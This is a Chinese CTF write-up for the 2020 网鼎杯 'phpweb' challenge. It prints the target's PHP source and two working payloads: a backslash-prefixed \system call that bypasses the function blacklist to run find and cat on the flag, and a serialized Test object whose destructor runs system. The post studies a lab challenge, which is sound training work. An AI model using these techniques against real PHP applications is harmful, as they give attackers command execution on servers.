首页 > 编程语言 >[网鼎杯 2020 朱雀组]phpweb

[网鼎杯 2020 朱雀组]phpweb

时间:2023-10-08 10:57:12浏览次数:54  
标签:name phpweb system flag 源码 2020 func 网鼎杯 find

原理

反序列化
命令执行
call_user_func

解题过程

首先进入靶场莫名其妙报了个错,翻译一下是date()函数的问题- -不管了,先看页面原代码

看到这里有自动post请求,数据时func=date&p=Y-m-d h:i:s a,看格式像是传入一个函数和参数,那就试试

使用func=system&p=ls却发现过滤了,尝试了很多其他命令执行的函数也都不行

看了wp才知道可以读取源码,思路太窄了- -

file_get_contents(),highlight_file(),show_source()读取文件源码
func=file_get_contents&p=index.php
得到源码如下
<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

蛙趣,过滤了相当多的函数,不能写入木马,也不能命令执行

解法一

但是php执行执行代码的时候会跳过特殊的字符串,因此可以通过添加特殊字符串的方式绕过黑名单

func=\system&p=ls
func=\system&p=ls /
都没有找到flag,那就只能用find找了
func=\system&p=find / -name flag*  --通过这个payload找出来有很多文件名,难找
func=\system&p=cat $(find / -name flag*)或者func=\system&p=cat `find / -name flag*`  --通过这个直接读取所有含flag名字的文件内容即可,最终得到flag

解法二

查看源码可以知道Test是一个类,且没有禁用unserialize,同时析构函数也会调用call_user_func,所以可以利用反序列化构造payload,更改参数func和p

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}

参考文章:https://blog.csdn.net/qq_63701832/article/details/128597385
https://www.cnblogs.com/h40vv3n/p/17701039.html

标签:name,phpweb,system,flag,源码,2020,func,网鼎杯,find
From: https://www.cnblogs.com/BEONTHE/p/17748351.html

相关文章

  • 文本分类 2018-2020 文献分析
    文本分类转自https://mp.weixin.qq.com/s/0hKzedHimfPtWgzEk49YzAhttps://mp.weixin.qq.com/s/0hKzedHimfPtWgzEk49YzA ASurveyonTextClassification:FromShallowtoDeepLearning,2020[1]     2018Multi-grainedattentionnetworkforaspect-level......
  • [网鼎杯 2018]Fakebook
    原理sql注入关键字绕过反序列化ssrf解题过程进入靶场,有登录按钮和注册按钮。查看页面原代码,对应是login.php和join.php,先注册一个看看有什么blog随便输发现会报错,其他也是,那试试输入一个网站呢?输入www.baidu.com发现可以进入这个界面,先看看原代码吧发现这个按钮的地......
  • 2023牛客国庆集训派对day8/牛客2020年暑期多校day8
    Preface妈的多校都是些什么题啊,一场比赛后三小时全程啥也干不了只能划划水,最后开榜就看手速排名,给他唐完了这场开场和前期久违地顺利,按难度开了三道签到后队里讨论了下秒出了A的正解我爬上去摸了会虽然nt错误频发WA了两发,但后面还是成功抢到了A题的一血,同时徐神和祁神坐在下面......
  • 【题解】洛谷#P7073 [CSP-J2020] 表达式
    【题解】洛谷#P7073[CSP-J2020]表达式Description给定一个逻辑表达式和其中每一个操作数的初始取值后,再取反某一个操作数的值时,求出原表达式的值。表达式将采用后缀表达式的方式输入。Solution根据题目可得,当取反一个操作数的值时,整个表达式大体只有变与不变两种情况,而往下......
  • AutoCAD Electrical 2020 64位简体中文安装版下载 安装包下载
    AutoCADElectrical2013基于在AutoCAD2013打造,Electrical版本也叫AutoCAD电气版,在AutoCAD的基础上添加了一个Electrical模块,内置简体中文,增加了多种工具和一整套电气设计CAD功能,如符号库、物料清单(BOM)报告和PLCI/O设计等等,增强了界面视觉效果,专业的电器设计工具可极大的提高了......
  • 「Artlantis下载」Artlantis渲染器2020版 安装包下载方式
    Artlantis2020官方版是一款三维渲染软件,Artlantis2020官方版主要用于建筑绘图场景的三维渲染,对于建筑设计师来说,这款软件可以帮助极大提高渲染效率。软件可与市场上的所有3D建模软件兼容,是创建逼真的渲染和动画的最简单,最快的解决方案。自带渲染引擎,用户无需借助其他软件,专家和初......
  • 2020 ICPC 南京 EFKL
    2020-2021ACM-ICPC,AsiaNanjingRegionalContest(XXIOpenCup,GrandPrixofNanjing)E.EvilCoordinate思路:因为如果给定了起点和初始走法,其实我们的终点是一定确定的。我们不妨让上下左右的连着一块走,那么对于\(RLUD\)一共有\(4!\)种走法(全排列),我们暴力枚举然后\(ch......
  • [ACTF2020 新生赛]Exec 1
    原理linux系统命令的使用命令执行漏洞解题过程打开靶场发现有ping功能,猜测是涉及命令执行漏洞,根据题目的Exec也能看出回来,先试试ping127.0.0.1,没问题接着使用&连接符执行多条系统命令,执行了ls命令,发现只有index.php,猜测flag是在根目录那里,所以我们就是用ls/来找出flagpa......
  • BUUOJ[ACTF2020 新生赛]Include 1
    原理文件包含伪协议的利用解题过程靶场进入发现一个超链接,点了一下发现跳转到了flag.php文件传递了参数file=flag.php。猜测应该是文件包含。文件包含读取文件源码要想到伪协议了。--要多补补了payload:?file=php://filter/read=convert.base64-encode/resource=flag.php......
  • [网鼎杯 2018]Fakebook
    这是一道SQL联合注入与ssrf的题目解题过程进入链接发现是一个注册登录界面。在登录页面尝试注入没有作用。先随便注册一个用户登录后点击用户名跳转到详情界面随手测试发现存在报错,大概率有SQL注入1and1=2无回显测试为数字型注入尝试union联合注入,1orderby4查询......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99